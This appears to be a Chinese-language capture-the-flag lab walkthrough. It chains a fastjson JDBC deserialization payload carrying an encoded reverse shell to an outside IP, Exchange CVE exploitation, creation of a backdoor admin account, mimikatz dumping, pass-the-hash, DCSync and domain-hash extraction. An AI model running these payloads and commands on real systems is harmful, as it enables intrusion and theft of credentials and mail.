华夏erp信息泄露
/user/getAllList;.ico
/user/list?search=路由下jdbc反序列化
{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "8.149.142.195", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0OS4xNDIuMTk1Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }
GET /user/list?search=%7b%20%22%6e%61%6d%65%22%3a%20%7b%20%22%40%74%79%70%65%22%3a%20%22%6a%61%76%61%2e%6c%61%6e%67%2e%41%75%74%6f%43%6c%6f%73%65%61%62%6c%65%22%2c%20%22%40%74%79%70%65%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%4a%44%42%43%34%43%6f%6e%6e%65%63%74%69%6f%6e%22%2c%20%22%68%6f%73%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%22%38%2e%31%34%39%2e%31%34%32%2e%31%39%35%22%2c%20%22%70%6f%72%74%54%6f%43%6f%6e%6e%65%63%74%54%6f%22%3a%20%33%33%30%36%2c%20%22%69%6e%66%6f%22%3a%20%7b%20%22%75%73%65%72%22%3a%20%22%79%73%6f%5f%43%6f%6d%6d%6f%6e%73%43%6f%6c%6c%65%63%74%69%6f%6e%73%36%5f%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%34%4c%6a%45%30%4f%53%34%78%4e%44%49%75%4d%54%6b%31%4c%7a%6b%35%4f%54%6b%67%4d%44%34%6d%4d%51%3d%3d%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2c%20%22%70%61%73%73%77%6f%72%64%22%3a%20%22%70%61%73%73%22%2c%20%22%73%74%61%74%65%6d%65%6e%74%49%6e%74%65%72%63%65%70%74%6f%72%73%22%3a%20%22%63%6f%6d%2e%6d%79%73%71%6c%2e%6a%64%62%63%2e%69%6e%74%65%72%63%65%70%74%6f%72%73%2e%53%65%72%76%65%72%53%74%61%74%75%73%44%69%66%66%49%6e%74%65%72%63%65%70%74%6f%72%22%2c%20%22%61%75%74%6f%44%65%73%65%72%69%61%6c%69%7a%65%22%3a%20%22%74%72%75%65%22%2c%20%22%4e%55%4d%5f%48%4f%53%54%53%22%3a%20%22%31%22%20%7d%20%7d
老规矩viper上线加fscan
(icmp) Target 172.22.3.12 is alive 本机
(icmp) Target 172.22.3.2 is alive [+]DC XIAORANG-WIN16.xiaorang.lab
(icmp) Target 172.22.3.9 is alive web
(icmp) Target 172.22.3.26 is alive XIAORANG\XIAORANG-PC
Exchange Server 2016172.22.3.9
Outlook Web AppWindows Server 2016 Datacenter
search一下
CVE-2021-26855 CVE-2021-27065
80,443,81,444
nt authority\system
加用户
net user dionysus QWE123qwe. /add
net localgroup administrators dionysus /add
rdp上去,再上线viper
(icmp) Target 172.22.3.12 is alive 拿下
(icmp) Target 172.22.3.2 is alive [+]DC XIAORANG-WIN16.xiaorang.lab
(icmp) Target 172.22.3.9 is alive 拿下
(icmp) Target 172.22.3.26 is alive XIAORANG\XIAORANG-PC
加下来打机器
privilege::debug
sekurlsa::logonpasswords
zhangtong : 22c7f81993e96ac83ac2f3f1903de8b4
XIAORANG-EXC01$ : 20dec4a0c5684274c26c514cc3d45fe3
p4 xfreerdp /pth:20dec4a0c5684274c26c514cc3d45fe3 /u:XIAORANG-EXC01$ /v:172.22.3.9:3389
p4 xfreerdp /pth:22c7f81993e96ac83ac2f3f1903de8b4 /u:zhangtong /v:172.22.3.9:3389
p4 bloodhound-python -u XIAORANG-EXC01$ --hashes "20dec4a0c5684274c26c514cc3d45fe3:20dec4a0c5684274c26c514cc3d45fe3" -d xiaorang.lab -dc XIAORANG-WIN16.xiaorang.lab -c all --dns-tcp -ns 172.22.3.2 --auth-method ntlm --zip
雪豹跑完后丢进数据库
EXC01机器账户默认对域内成员具有writeDacl权限,所以EXC01机器就可以修改其他账户的ACL,从而使Zhangtong获得DCSync,从而就可以使用Zhangtong,来抓域控哈希
proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :20dec4a0c5684274c26c514cc3d45fe3 -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2
proxychains python3 secretsdump.py xiaorang.lab/[email protected] -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm
xiaorang.lab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7acbc09a6c0efd81bfa7d5a1d4238beb:::
域管理员hash在此
proxychains python3 wmiexec.py xiaorang.lab/[email protected] -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2
最后dump邮件内容
proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:7acbc09a6c0efd81bfa7d5a1d4238beb' --action Download